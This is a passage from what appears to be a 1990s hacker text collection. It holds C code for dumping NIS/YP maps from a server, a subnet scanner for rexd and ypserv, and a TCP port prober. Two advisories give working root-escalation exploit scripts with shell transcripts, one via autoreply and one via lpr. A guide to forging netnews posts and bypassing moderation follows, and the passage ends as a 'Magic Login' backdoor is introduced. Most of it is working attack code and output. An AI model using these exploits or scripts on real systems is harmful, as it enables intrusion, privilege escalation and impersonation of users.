alarm(0);
|
|||
|
|
|||
|
if (errcode != RPC_SUCCESS)
|
|||
|
print_rpc_err(errcode);
|
|||
|
|
|||
|
/*
|
|||
|
* Print the domain name.
|
|||
|
*/
|
|||
|
printf("%.*s", BOOTPARAM_MAXDOMAINLEN, w_res.domain_name);
|
|||
|
|
|||
|
/*
|
|||
|
* The maximum domain name length is 255 characters, but the
|
|||
|
* rpc.bootparamd program truncates anything over 32 chars.
|
|||
|
*/
|
|||
|
if (strlen(w_res.domain_name) >= BOOTPARAM_MAXDOMAINLEN)
|
|||
|
printf(" (truncated?)");
|
|||
|
|
|||
|
/*
|
|||
|
* Put out the client name, if they didn't know it.
|
|||
|
*/
|
|||
|
if (hostip != -1)
|
|||
|
printf(" (client name = %s)", w_res.client_name);
|
|||
|
|
|||
|
putchar('\n');
|
|||
|
}
|
|||
|
|
|||
|
/*
|
|||
|
* get_yp_map - get the yp map "mapname" from yp domain "domain" from server.
|
|||
|
*/
|
|||
|
get_yp_map(server, domain, mapname)
|
|||
|
char *server, *domain, *mapname;
|
|||
|
{
|
|||
|
char *reqp;
|
|||
|
bool_t yesno;
|
|||
|
u_long calltype;
|
|||
|
bool (*xdr_proc)();
|
|||
|
extern void timeout();
|
|||
|
enum clnt_stat errcode;
|
|||
|
struct ypreq_key keyreq;
|
|||
|
struct ypreq_nokey nokeyreq;
|
|||
|
struct ypresp_key_val answer;
|
|||
|
|
|||
|
/*
|
|||
|
* This code isn't needed; the next call will give the same
|
|||
|
* error message if there's no yp server there.
|
|||
|
*/
|
|||
|
#ifdef not_necessary
|
|||
|
/*
|
|||
|
* "Ping" the yp server and see if it's there.
|
|||
|
*/
|
|||
|
signal(SIGALRM, timeout);
|
|||
|
alarm(YPSNARF_TIMEOUT1);
|
|||
|
|
|||
|
errcode = callrpc(host, YPPROG, YPVERS, YPPROC_NULL, xdr_void, 0,
|
|||
|
xdr_void, 0);
|
|||
|
|
|||
|
alarm(0);
|
|||
|
|
|||
|
if (errcode != RPC_SUCCESS)
|
|||
|
print_rpc_err(errcode);
|
|||
|
#endif
|
|||
|
|
|||
|
/*
|
|||
|
* Figure out whether server serves the yp domain we want.
|
|||
|
*/
|
|||
|
signal(SIGALRM, timeout);
|
|||
|
alarm(YPSNARF_TIMEOUT1);
|
|||
|
|
|||
|
errcode = callrpc(server, YPPROG, YPVERS, YPPROC_DOMAIN,
|
|||
|
xdr_wrapstring, (caddr_t) &domain, xdr_bool,
|
|||
|
(caddr_t) &yesno);
|
|||
|
|
|||
|
alarm(0);
|
|||
|
|
|||
|
if (errcode != RPC_SUCCESS)
|
|||
|
print_rpc_err(errcode);
|
|||
|
|
|||
|
/*
|
|||
|
* Nope...
|
|||
|
*/
|
|||
|
if (yesno == FALSE) {
|
|||
|
fprintf(stderr, "%s: %s does not serve domain %s.\n", pname,
|
|||
|
server, domain);
|
|||
|
exit(1);
|
|||
|
}
|
|||
|
|
|||
|
/*
|
|||
|
* Now we just read entry after entry... The first entry we
|
|||
|
* get with a nokey request.
|
|||
|
*/
|
|||
|
keyreq.domain = nokeyreq.domain = domain;
|
|||
|
keyreq.map = nokeyreq.map = mapname;
|
|||
|
reqp = (caddr_t) &nokeyreq;
|
|||
|
keyreq.keydat.dptr = NULL;
|
|||
|
|
|||
|
answer.status = TRUE;
|
|||
|
calltype = YPPROC_FIRST;
|
|||
|
xdr_proc = xdr_ypreq_nokey;
|
|||
|
|
|||
|
while (answer.status == TRUE) {
|
|||
|
bzero((caddr_t) &answer, sizeof(struct ypresp_key_val));
|
|||
|
|
|||
|
signal(SIGALRM, timeout);
|
|||
|
alarm(YPSNARF_TIMEOUT2);
|
|||
|
|
|||
|
errcode = callrpc(server, YPPROG, YPVERS, calltype, xdr_proc,
|
|||
|
reqp, xdr_ypresp_key_val, &answer);
|
|||
|
|
|||
|
alarm(0);
|
|||
|
|
|||
|
if (errcode != RPC_SUCCESS)
|
|||
|
print_rpc_err(errcode);
|
|||
|
|
|||
|
/*
|
|||
|
* Got something; print it.
|
|||
|
*/
|
|||
|
if (answer.status == TRUE) {
|
|||
|
printf("%.*s\n", answer.valdat.dsize,
|
|||
|
answer.valdat.dptr);
|
|||
|
}
|
|||
|
|
|||
|
/*
|
|||
|
* Now we're requesting the next item, so have to
|
|||
|
* send back the current key.
|
|||
|
*/
|
|||
|
calltype = YPPROC_NEXT;
|
|||
|
reqp = (caddr_t) &keyreq;
|
|||
|
xdr_proc = xdr_ypreq_key;
|
|||
|
|
|||
|
if (keyreq.keydat.dptr)
|
|||
|
free(keyreq.keydat.dptr);
|
|||
|
|
|||
|
keyreq.keydat = answer.keydat;
|
|||
|
|
|||
|
if (answer.valdat.dptr)
|
|||
|
free(answer.valdat.dptr);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
/*
|
|||
|
* get_yp_maplist - get the yp map list for yp domain "domain" from server.
|
|||
|
*/
|
|||
|
get_yp_maplist(server, domain)
|
|||
|
char *server, *domain;
|
|||
|
{
|
|||
|
bool_t yesno;
|
|||
|
extern void timeout();
|
|||
|
struct ypmaplist *mpl;
|
|||
|
enum clnt_stat errcode;
|
|||
|
struct ypresp_maplist maplist;
|
|||
|
|
|||
|
/*
|
|||
|
* This code isn't needed; the next call will give the same
|
|||
|
* error message if there's no yp server there.
|
|||
|
*/
|
|||
|
#ifdef not_necessary
|
|||
|
/*
|
|||
|
* "Ping" the yp server and see if it's there.
|
|||
|
*/
|
|||
|
signal(SIGALRM, timeout);
|
|||
|
alarm(YPSNARF_TIMEOUT1);
|
|||
|
|
|||
|
errcode = callrpc(host, YPPROG, YPVERS, YPPROC_NULL, xdr_void, 0,
|
|||
|
xdr_void, 0);
|
|||
|
|
|||
|
alarm(0);
|
|||
|
|
|||
|
if (errcode != RPC_SUCCESS)
|
|||
|
print_rpc_err(errcode);
|
|||
|
#endif
|
|||
|
|
|||
|
/*
|
|||
|
* Figure out whether server serves the yp domain we want.
|
|||
|
*/
|
|||
|
signal(SIGALRM, timeout);
|
|||
|
alarm(YPSNARF_TIMEOUT1);
|
|||
|
|
|||
|
errcode = callrpc(server, YPPROG, YPVERS, YPPROC_DOMAIN,
|
|||
|
xdr_wrapstring, (caddr_t) &domain, xdr_bool,
|
|||
|
(caddr_t) &yesno);
|
|||
|
|
|||
|
alarm(0);
|
|||
|
|
|||
|
if (errcode != RPC_SUCCESS)
|
|||
|
print_rpc_err(errcode);
|
|||
|
|
|||
|
/*
|
|||
|
* Nope...
|
|||
|
*/
|
|||
|
if (yesno == FALSE) {
|
|||
|
fprintf(stderr, "%s: %s does not serve domain %s.\n", pname,
|
|||
|
server, domain);
|
|||
|
exit(1);
|
|||
|
}
|
|||
|
|
|||
|
maplist.list = (struct ypmaplist *) NULL;
|
|||
|
|
|||
|
/*
|
|||
|
* Now ask for the list.
|
|||
|
*/
|
|||
|
signal(SIGALRM, timeout);
|
|||
|
alarm(YPSNARF_TIMEOUT1);
|
|||
|
|
|||
|
errcode = callrpc(server, YPPROG, YPVERS, YPPROC_MAPLIST,
|
|||
|
xdr_wrapstring, (caddr_t) &domain,
|
|||
|
xdr_ypresp_maplist, &maplist);
|
|||
|
|
|||
|
alarm(0);
|
|||
|
|
|||
|
if (errcode != RPC_SUCCESS)
|
|||
|
print_rpc_err(errcode);
|
|||
|
|
|||
|
if (maplist.status != YP_TRUE) {
|
|||
|
fprintf(stderr, "%s: cannot get map list: %s\n", pname,
|
|||
|
yperr_string(ypprot_err(maplist.status)));
|
|||
|
exit(1);
|
|||
|
}
|
|||
|
|
|||
|
/*
|
|||
|
* Print out the list.
|
|||
|
*/
|
|||
|
for (mpl = maplist.list; mpl != NULL; mpl = mpl->ypml_next)
|
|||
|
printf("%s\n", mpl->ypml_name);
|
|||
|
}
|
|||
|
|
|||
|
/*
|
|||
|
* print_rpc_err - print an rpc error and exit.
|
|||
|
*/
|
|||
|
print_rpc_err(errcode)
|
|||
|
enum clnt_stat errcode;
|
|||
|
{
|
|||
|
fprintf(stderr, "%s: %s\n", pname, clnt_sperrno(errcode));
|
|||
|
exit(1);
|
|||
|
}
|
|||
|
|
|||
|
/*
|
|||
|
* timeout - print a timeout and exit.
|
|||
|
*/
|
|||
|
void timeout()
|
|||
|
{
|
|||
|
fprintf(stderr, "%s: RPC request (callrpc) timed out.\n", pname);
|
|||
|
exit(1);
|
|||
|
}
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
#!/bin/perl -s
|
|||
|
#
|
|||
|
# Scan a subnet for valid hosts; if given hostname, will look at the
|
|||
|
# 255 possible hosts on that net. Report if host is running rexd or
|
|||
|
# ypserv.
|
|||
|
#
|
|||
|
# Usage: scan n.n.n.n
|
|||
|
|
|||
|
# mine, by default
|
|||
|
$default = "130.80.26";
|
|||
|
|
|||
|
$| = 1;
|
|||
|
|
|||
|
if ($v) { $verbose = 1; }
|
|||
|
|
|||
|
if ($#ARGV == -1) { $root = $default; }
|
|||
|
else { $root = $ARGV[0]; }
|
|||
|
|
|||
|
# ip address
|
|||
|
if ($root !~ /[0-9]+\.[0-9]+\.[0-9]+/) {
|
|||
|
($na, $ad, $ty, $le, @host_ip) = gethostbyname($root);
|
|||
|
($one,$two,$three,$four) = unpack('C4',$host_ip[0]);
|
|||
|
$root = "$one.$two.$three";
|
|||
|
if ($root eq "..") { die "Can't figure out what to scan...\n"; }
|
|||
|
}
|
|||
|
|
|||
|
print "Subnet $root:\n" if $verbose;
|
|||
|
for $i (01..255) {
|
|||
|
print "Trying $root.$i\t=> " if $verbose;
|
|||
|
&resolve("$root.$i");
|
|||
|
}
|
|||
|
|
|||
|
#
|
|||
|
# Do the work
|
|||
|
#
|
|||
|
sub resolve {
|
|||
|
|
|||
|
local($name) = @_;
|
|||
|
|
|||
|
# ip address
|
|||
|
if ($name =~ /[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/) {
|
|||
|
($a,$b,$c,$d) = split(/\./, $name);
|
|||
|
@ip = ($a,$b,$c,$d);
|
|||
|
($name) = gethostbyaddr(pack("C4", @ip), &AF_INET);
|
|||
|
}
|
|||
|
else {
|
|||
|
($name, $aliases, $type, $len, @ip) = gethostbyname($name);
|
|||
|
($a,$b,$c,$d) = unpack('C4',$ip[0]);
|
|||
|
}
|
|||
|
|
|||
|
if ($name && @ip) {
|
|||
|
print "$a.$b.$c.$d\t$name\n";
|
|||
|
system("if ping $name 5 > /dev/null ; then\nif rpcinfo -u $name 100005 > /dev/null ; then showmount -e $name\nfi\nif rpcinfo -t $name 100017 > /dev/null ; then echo \"Running rexd.\"\nfi\nif rpcinfo -u $name 100004 > /dev/null ; then echo \"R
|
|||
|
unning ypserv.\"\nfi\nfi");
|
|||
|
}
|
|||
|
else { print "unable to resolve address\n" if $verbose; }
|
|||
|
|
|||
|
}
|
|||
|
|
|||
|
sub AF_INET {2;}
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
/*
|
|||
|
* probe_tcp_ports
|
|||
|
*/
|
|||
|
|
|||
|
|
|||
|
#include <sys/types.h>
|
|||
|
#include <sys/stat.h>
|
|||
|
#include <stdio.h>
|
|||
|
#include <ctype.h>
|
|||
|
#include <sys/socket.h>
|
|||
|
#include <netinet/in.h>
|
|||
|
#include <netdb.h>
|
|||
|
|
|||
|
#define RETURN_ERR -1
|
|||
|
#define RETURN_FAIL 0
|
|||
|
#define RETURN_SUCCESS 1
|
|||
|
|
|||
|
int Debug;
|
|||
|
int Hack;
|
|||
|
int Verbose;
|
|||
|
|
|||
|
main(ArgC, ArgV)
|
|||
|
int ArgC;
|
|||
|
char **ArgV;
|
|||
|
{
|
|||
|
int Index;
|
|||
|
int SubIndex;
|
|||
|
|
|||
|
for (Index = 1; (Index < ArgC) && (ArgV[Index][0] == '-'); Index++)
|
|||
|
for (SubIndex = 1; ArgV[Index][SubIndex]; SubIndex++)
|
|||
|
switch (ArgV[Index][SubIndex])
|
|||
|
{
|
|||
|
case 'd':
|
|||
|
Debug++;
|
|||
|
break;
|
|||
|
case 'h':
|
|||
|
Hack++;
|
|||
|
break;
|
|||
|
case 'v':
|
|||
|
Verbose++;
|
|||
|
break;
|
|||
|
default:
|
|||
|
(void) fprintf(stderr,
|
|||
|
"Usage: probe_tcp_ports [-dhv] [hostname [hostname ...] ]\n");
|
|||
|
exit(1);
|
|||
|
}
|
|||
|
|
|||
|
for (; Index < ArgC; Index++)
|
|||
|
(void) Probe_TCP_Ports(ArgV[Index]);
|
|||
|
exit(0);
|
|||
|
}
|
|||
|
|
|||
|
Probe_TCP_Ports(Name)
|
|||
|
char *Name;
|
|||
|
{
|
|||
|
unsigned Port;
|
|||
|
char *Host;
|
|||
|
struct hostent *HostEntryPointer;
|
|||
|
struct sockaddr_in SocketInetAddr;
|
|||
|
struct hostent TargetHost;
|
|||
|
struct in_addr TargetHostAddr;
|
|||
|
char *AddressList[1];
|
|||
|
char NameBuffer[128];
|
|||
|
|
|||
|
extern int inet_addr();
|
|||
|
extern char *rindex();
|
|||
|
|
|||
|
if (Name == NULL)
|
|||
|
return (RETURN_FAIL);
|
|||
|
Host = Name;
|
|||
|
if (Host == NULL)
|
|||
|
return (RETURN_FAIL);
|
|||
|
HostEntryPointer = gethostbyname(Host);
|
|||
|
if (HostEntryPointer == NULL)
|
|||
|
{
|
|||
|
TargetHostAddr.s_addr = inet_addr(Host);
|
|||
|
if (TargetHostAddr.s_addr == -1)
|
|||
|
{
|
|||
|
(void) printf("unknown host: %s\n", Host);
|
|||
|
return (RETURN_FAIL);
|
|||
|
}
|
|||
|
(void) strcpy(NameBuffer, Host);
|
|||
|
TargetHost.h_name = NameBuffer;
|
|||
|
TargetHost.h_addr_list = AddressList, TargetHost.h_addr =
|
|||
|
(char *) &TargetHostAddr;
|
|||
|
TargetHost.h_length = sizeof(struct in_addr);
|
|||
|
TargetHost.h_addrtype = AF_INET;
|
|||
|
TargetHost.h_aliases = 0;
|
|||
|
HostEntryPointer = &TargetHost;
|
|||
|
}
|
|||
|
SocketInetAddr.sin_family = HostEntryPointer->h_addrtype;
|
|||
|
bcopy(HostEntryPointer->h_addr, (char *) &SocketInetAddr.sin_addr,
|
|||
|
HostEntryPointer->h_length);
|
|||
|
|
|||
|
|
|||
|
for (Port = 1; Port < 65536; Port++)
|
|||
|
(void) Probe_TCP_Port(Port, HostEntryPointer, SocketInetAddr);
|
|||
|
return (RETURN_SUCCESS);
|
|||
|
}
|
|||
|
|
|||
|
Probe_TCP_Port(Port, HostEntryPointer, SocketInetAddr)
|
|||
|
unsigned Port;
|
|||
|
struct hostent *HostEntryPointer;
|
|||
|
struct sockaddr_in SocketInetAddr;
|
|||
|
{
|
|||
|
char Buffer[BUFSIZ];
|
|||
|
int SocketDescriptor;
|
|||
|
struct servent *ServiceEntryPointer;
|
|||
|
|
|||
|
|
|||
|
SocketInetAddr.sin_port = Port;
|
|||
|
SocketDescriptor = socket(AF_INET, SOCK_STREAM, 6);
|
|||
|
if (SocketDescriptor < 0)
|
|||
|
{
|
|||
|
perror("socket");
|
|||
|
return (RETURN_ERR);
|
|||
|
}
|
|||
|
if (Verbose)
|
|||
|
{
|
|||
|
(void) printf("Host %s, Port %d ", HostEntryPointer->h_name,
|
|||
|
Port);
|
|||
|
if ((ServiceEntryPointer = getservbyport(Port, "tcp")) !=
|
|||
|
(struct servent *) NULL)
|
|||
|
(void) printf(" (\"%s\" service) ",
|
|||
|
ServiceEntryPointer->s_name);
|
|||
|
(void) printf("connection ... ");
|
|||
|
(void) fflush(stdout);
|
|||
|
}
|
|||
|
if (connect(SocketDescriptor, (char *) &SocketInetAddr,
|
|||
|
sizeof(SocketInetAddr)) < 0)
|
|||
|
{
|
|||
|
if (Verbose)
|
|||
|
(void) printf("NOT open.\n");
|
|||
|
if (Debug)
|
|||
|
perror("connect");
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
if (!Verbose)
|
|||
|
{
|
|||
|
(void) printf("Host %s, Port %d ",
|
|||
|
HostEntryPointer->h_name, Port);
|
|||
|
if ((ServiceEntryPointer = getservbyport(Port,"tcp")) !=
|
|||
|
(struct servent *) NULL)
|
|||
|
(void) printf(" (\"%s\" service) ",
|
|||
|
ServiceEntryPointer->s_name);
|
|||
|
(void) printf("connection ... ");
|
|||
|
(void) fflush(stdout);
|
|||
|
}
|
|||
|
(void) printf("open.\n");
|
|||
|
if (Hack)
|
|||
|
{
|
|||
|
(void) sprintf(Buffer, "/usr/ucb/telnet %s %d",
|
|||
|
HostEntryPointer->h_name, Port);
|
|||
|
(void) system(Buffer);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
(void) close(SocketDescriptor);
|
|||
|
return (RETURN_SUCCESS);
|
|||
|
}
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
[8lgm]-Advisory-2.UNIX.autoreply.12-Jul-1991
|
|||
|
|
|||
|
PROGRAM:
|
|||
|
|
|||
|
autoreply(1) (/usr/local/bin/autoreply)
|
|||
|
Supplied with the Elm Mail System
|
|||
|
|
|||
|
VULNERABLE OS's:
|
|||
|
|
|||
|
Any system with a standard installation of The Elm Mail System.
|
|||
|
All versions are believed to have this vulnerability.
|
|||
|
|
|||
|
DESCRIPTION:
|
|||
|
|
|||
|
autoreply(1) can be used to create root owned files, with mode
|
|||
|
666. It can also overwrite any file with semi user-controlled
|
|||
|
data.
|
|||
|
|
|||
|
IMPACT:
|
|||
|
|
|||
|
Any user with access to autoreply(1) can alter system files and
|
|||
|
thus become root.
|
|||
|
|
|||
|
REPEAT BY:
|
|||
|
|
|||
|
This example demonstrates how to become root on most affected
|
|||
|
machines by modifying root's .rhosts file. Please do not do
|
|||
|
this unless you have permission.
|
|||
|
|
|||
|
Create the following script, 'fixrhosts':
|
|||
|
|
|||
|
8<--------------------------- cut here ----------------------------
|
|||
|
#!/bin/sh
|
|||
|
#
|
|||
|
# fixrhosts rhosts-file user machine
|
|||
|
#
|
|||
|
if [ $# -ne 3 ]; then
|
|||
|
echo "Usage: `basename $0` rhosts-file user machine"
|
|||
|
exit 1
|
|||
|
fi
|
|||
|
RHOSTS="$1"
|
|||
|
USERNAME="$2"
|
|||
|
MACHINE="$3"
|
|||
|
cd $HOME
|
|||
|
echo x > "a
|
|||
|
$MACHINE $USERNAME
|
|||
|
b"
|
|||
|
umask 022
|
|||
|
autoreply "a
|
|||
|
$MACHINE $USERNAME
|
|||
|
b"
|
|||
|
cat > /tmp/.rhosts.sh.$$ << 'EOF'
|
|||
|
ln -s $1 `echo $$ | awk '{printf "/tmp/arep.%06d", $1}'`
|
|||
|
exec autoreply off
|
|||
|
exit 0
|
|||
|
EOF
|
|||
|
/bin/sh /tmp/.rhosts.sh.$$ $RHOSTS
|
|||
|
rm -f /tmp/.rhosts.sh.$$ "a
|
|||
|
$MACHINE $USERNAME
|
|||
|
b"
|
|||
|
exit 0
|
|||
|
8<--------------------------- cut here ----------------------------
|
|||
|
|
|||
|
(Lines marked with > represent user input)
|
|||
|
|
|||
|
> % id
|
|||
|
uid=97(8lgm) gid=97(8lgm) groups=97(8lgm)
|
|||
|
> % ./fixrhosts ~root/.rhosts 8lgm localhost
|
|||
|
You've been added to the autoreply system.
|
|||
|
You've been removed from the autoreply table.
|
|||
|
> % rsh localhost -l root csh -i
|
|||
|
Warning: no access to tty.
|
|||
|
Thus no job control in this shell.
|
|||
|
#
|
|||
|
|
|||
|
|
|||
|
FIX:
|
|||
|
|
|||
|
1. Disable autoreply.
|
|||
|
2. Wait for a patch from the Elm maintainers.
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
[8lgm]-Advisory-3.UNIX.lpr.19-Aug-1991
|
|||
|
|
|||
|
PROGRAM:
|
|||
|
|
|||
|
lpr(1) (/usr/ucb/lpr or /usr/bin/lpr)
|
|||
|
|
|||
|
VULNERABLE OS's:
|
|||
|
|
|||
|
SunOS 4.1.1 or earlier
|
|||
|
BSD 4.3
|
|||
|
BSD NET/2 Derived Systems
|
|||
|
A/UX 2.0.1
|
|||
|
|
|||
|
Most systems supporting the BSD LP subsystem
|
|||
|
|
|||
|
|
|||
|
DESCRIPTION:
|
|||
|
|
|||
|
lpr(1) can be used to overwrite or create (and become owner of)
|
|||
|
any file on the system. lpr -s allows users to create symbolic
|
|||
|
links in lpd's spool directory (typically /var/spool/lpd).
|
|||
|
After 1000 invocations of lpr, lpr will reuse the filename in
|
|||
|
the spool directory, and follow the link previously installed.
|
|||
|
It will thus overwrite/create any file that this link points too.
|
|||
|
|
|||
|
IMPACT:
|
|||
|
|
|||
|
Any user with access to lpr(1) can alter system files and thus
|
|||
|
become root.
|
|||
|
|
|||
|
REPEAT BY:
|
|||
|
|
|||
|
This example demonstrates how to become root on most affected
|
|||
|
machines by modifying /etc/passwd and /etc/group. Please do
|
|||
|
not do this unless you have permission.
|
|||
|
|
|||
|
Create the following script, 'lprcp':
|
|||
|
|
|||
|
8<--------------------------- cut here ----------------------------
|
|||
|
#!/bin/csh -f
|
|||
|
#
|
|||
|
# Usage: lprcp from-file to-file
|
|||
|
#
|
|||
|
|
|||
|
if ($#argv != 2) then
|
|||
|
echo Usage: lprcp from-file to-file
|
|||
|
exit 1
|
|||
|
endif
|
|||
|
|
|||
|
# This link stuff allows us to overwrite unreadable files,
|
|||
|
# should we want to.
|
|||
|
echo x > /tmp/.tmp.$$
|
|||
|
lpr -q -s /tmp/.tmp.$$
|
|||
|
rm -f /tmp/.tmp.$$ # lpr's accepted it, point it
|
|||
|
ln -s $2 /tmp/.tmp.$$ # to where we really want
|
|||
|
|
|||
|
@ s = 0
|
|||
|
while ( $s != 999) # loop 999 times
|
|||
|
lpr /nofile >&/dev/null # doesn't exist, but spins the clock!
|
|||
|
@ s++
|
|||
|
if ( $s % 10 == 0 ) echo -n .
|
|||
|
end
|
|||
|
lpr $1 # incoming file
|
|||
|
# user becomes owner
|
|||
|
rm -f /tmp/.tmp.$$
|
|||
|
exit 0
|
|||
|
8<--------------------------- cut here ----------------------------
|
|||
|
|
|||
|
(Lines marked with > represent user input)
|
|||
|
|
|||
|
Make copies of /etc/passwd and /etc/group, and modify them:
|
|||
|
> % id
|
|||
|
uid=97(8lgm) gid=97(8lgm) groups=97(8lgm)
|
|||
|
> % cp /etc/passwd /tmp/passwd
|
|||
|
> % ex /tmp/passwd
|
|||
|
/tmp/passwd: unmodified: line 42
|
|||
|
> :a
|
|||
|
> 8lgmroot::0:0:Test account for lpr bug:/:/bin/csh
|
|||
|
> .
|
|||
|
> :wq
|
|||
|
/tmp/passwd: 43 lines, 2188 characters.
|
|||
|
> % cp /etc/group /tmp
|
|||
|
> % ex /tmp/group
|
|||
|
/tmp/group: unmodified: line 49
|
|||
|
> :/wheel
|
|||
|
wheel:*:0:root,operator
|
|||
|
> :c
|
|||
|
> wheel:*:0:root,operator,8lgm
|
|||
|
> .
|
|||
|
> :wq
|
|||
|
/tmp/group: 49 lines, 944 characters.
|
|||
|
|
|||
|
Install our new files:
|
|||
|
> % ./lprcp /tmp/group /etc/group
|
|||
|
................................................................
|
|||
|
...................................
|
|||
|
lpr: cannot rename /var/spool/lpd/cfA060testnode
|
|||
|
> % ./lprcp /tmp/passwd /etc/passwd
|
|||
|
.................................................................
|
|||
|
..................................
|
|||
|
lpr: cannot rename /var/spool/lpd/cfA061testnode
|
|||
|
|
|||
|
Check it worked:
|
|||
|
> % ls -l /etc/passwd /etc/group
|
|||
|
-rw-r--r-- 1 8lgm 944 Mar 3 19:56 /etc/group
|
|||
|
-rw-r--r-- 1 8lgm 2188 Mar 3 19:59 /etc/passwd
|
|||
|
> % head -1 /etc/group
|
|||
|
wheel:*:0:root,operator,8lgm
|
|||
|
> % grep '^8lgmroot' /etc/passwd
|
|||
|
8lgmroot::0:0:Test account for lpr bug:/:/bin/csh
|
|||
|
|
|||
|
Become root and tidy up:
|
|||
|
> % su 8lgmroot
|
|||
|
# chown root /etc/passwd /etc/group
|
|||
|
# rm -f /tmp/passwd /tmp/group
|
|||
|
#
|
|||
|
|
|||
|
FIX:
|
|||
|
|
|||
|
1. Contact your vendor for a fix.
|
|||
|
2. In the meantime, apply the following patch, derived from
|
|||
|
BSD NET/2 source, which will correct the flaw on most
|
|||
|
affected systems:
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
Anonymous netnews without "anonymous" remailers
|
|||
|
|
|||
|
Save any news article to a file. We'll call it "hak" in this example.
|
|||
|
Edit hak, and remove any header lines of the form
|
|||
|
|
|||
|
From some!random!path!user (note: "From ", not "From: " !!)
|
|||
|
Article:
|
|||
|
Lines:
|
|||
|
|
|||
|
Shorten the Path: header down to its LAST two or three "bangized" components.
|
|||
|
This is to make the article look like it was posted from where it really was
|
|||
|
posted, and originally hit the net at or near the host you send it to. Or
|
|||
|
you can construct a completely new Path: line to reflect your assumed alias.
|
|||
|
|
|||
|
Make some change to the Message-ID: field, that isn't likely to be
|
|||
|
duplicated anywhere. This is usually best done by adding a couple of
|
|||
|
random characters to the part before the @, since news posting programs
|
|||
|
generally use a fixed-length field to generate these IDs.
|
|||
|
|
|||
|
Change the other headers to say what you like -- From:, Newsgroups:,
|
|||
|
Sender:, etc. Replace the original message text with your message.
|
|||
|
If you are posting to a moderated group, remember to put in an Approved:
|
|||
|
header to bypass the moderation mechanism.
|
|||
|
|
|||
|
Write out the changed file, and send it to your favorite NNTP server that
|
|||
|
permits transfers via the IHAVE command, using the following script:
|
|||
|
|
|||
|
=======================
|
|||
|
#! /bin/sh
|
|||
|
## Post an article via IHAVE.
|
|||
|
## args: filename server
|
|||
|
|
|||
|
if test "$2" = "" ; then
|
|||
|
echo usage: $0 filename server
|
|||
|
exit 1
|
|||
|
fi
|
|||
|
if test ! -f $1 ; then
|
|||
|
echo $1: not found
|
|||
|
exit 1
|
|||
|
fi
|
|||
|
|
|||
|
# suck msg-id out of headers, keep the brackets
|
|||
|
msgid=`sed -e '/^$/,$d' $1 | egrep '^[Mm]essage-[Ii][Dd]: ' | \
|
|||
|
sed 's/.*-[Ii][Dd]: //'`
|
|||
|
echo $msgid
|
|||
|
|
|||
|
( sleep 5
|
|||
|
echo IHAVE $msgid
|
|||
|
sleep 3
|
|||
|
cat $1
|
|||
|
sleep 1
|
|||
|
echo "."
|
|||
|
sleep 1
|
|||
|
echo QUIT ) | telnet $2 119
|
|||
|
=======================
|
|||
|
|
|||
|
If your article doesn't appear in a day or two, try a different server.
|
|||
|
They are easy to find. Here's a script that will break a large file
|
|||
|
full of saved netnews into a list of hosts to try. Edit the output
|
|||
|
of this if you want, to remove obvious peoples' names and other trash.
|
|||
|
|
|||
|
=======================
|
|||
|
#! /bin/sh
|
|||
|
FGV='fgrep -i -v'
|
|||
|
egrep '^Path: ' $1 | sed -e 's/^Path: //' -e 's/!/\
|
|||
|
/g' | sort -u | fgrep . | $FGV .bitnet | $FGV .uucp
|
|||
|
=======================
|
|||
|
|
|||
|
Once you have your host list, feed it to the following script.
|
|||
|
|
|||
|
=======================
|
|||
|
#! /bin/sh
|
|||
|
|
|||
|
while read xx ; do
|
|||
|
if test "$xx" = "" ; then continue;
|
|||
|
fi
|
|||
|
echo === $xx
|
|||
|
( echo open $xx 119
|
|||
|
sleep 5
|
|||
|
echo ihave k00l@x.edu
|
|||
|
sleep 4
|
|||
|
echo .
|
|||
|
echo quit
|
|||
|
sleep 1
|
|||
|
echo quit
|
|||
|
) | telnet
|
|||
|
done
|
|||
|
=======================
|
|||
|
|
|||
|
If the above script is called "findem" and you're using csh, you should do
|
|||
|
|
|||
|
findem < list >& outfile
|
|||
|
|
|||
|
so that ALL output from telnet is captured. This takes a long time, but when
|
|||
|
it finishes, edit "outfile" and look for occurrences of "335". These mark
|
|||
|
answers from servers that might be willing to accept an article. This isn't a
|
|||
|
completely reliable indication, since some servers respond with acceptance and
|
|||
|
later drop articles. Try a given server with a slightly modified repeat of
|
|||
|
someone else's message, and see if it eventually appears.
|
|||
|
|
|||
|
You will notice other servers that don't necessarily take an IHAVE, but
|
|||
|
say "posting ok". You can probably do regular POSTS through these, but they
|
|||
|
will add an "NNTP-Posting-Host: " header containing the machine YOU came from.
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
Magic Login - Written by Data King - 7 July 1994
|
|||
|
|
|||
|
PLEASE NOTE:-
|
|||
|
|
|||
|
This program code is released on the understanding that neither the
|
|||
|
author or Phrack Magazine suggest that you implement this on **ANY**
|
|||
|
system that you are not authorized to do so. The author provides this
|
|||
|
implementation of a "Magic" login as a learning exercise in security
|
|||
|
programming.
|
|||
|
|
|||
|
Sorry for the disclaimer readers but I was advised by the AFP (Australian
|
|||
|
Federal Police) that if I ever released this code they would bust me for
|
|||
|
aiding and abetting. I am releasing it anyway as I believe in the right of
|
|||
|
people to KNOW, but not necessarily to DO.
|
|||
|
|
|||
|
As always I can be emailed at dking@suburbia.apana.org.au
|
|||
|
(Please note:- I have a NEW pgp signature.)
|
|||
|
|
|||
|
INTRODUCTION
|
|||
|
~~~~~~~~~~~~
|
|||
|
Briefly I am going to explain what a "Magic" login is and some of the steps you
|
|||
|
need to go through to receive the desired result. At the end of this article is
|
|||
|
a diff that can be applied to the shadow-3.2.2-linux archive to implement some
|
|||
|
of these ideas.
|
|||
|
|
|||
|
EXPLANATION
|
|||
|
~~~~~~~~~~~
|
|||
|
A "Magic" login is a modified login program that allows the user to login
|
|||
|
without knowing the correct password for the account they are logging into.
|
|||
|
|
|||
|
This is a very simple programming exercise and can be done by almost anyone, but
|
|||
|
a really effective "Magic" login program will do much more than this. The
|
|||
|
features of the supplied "Magic" login are:
|
|||
|
|
|||
|
- Will login to any valid account as long as you know the Magic password.
|
|||
|
|
|||
|
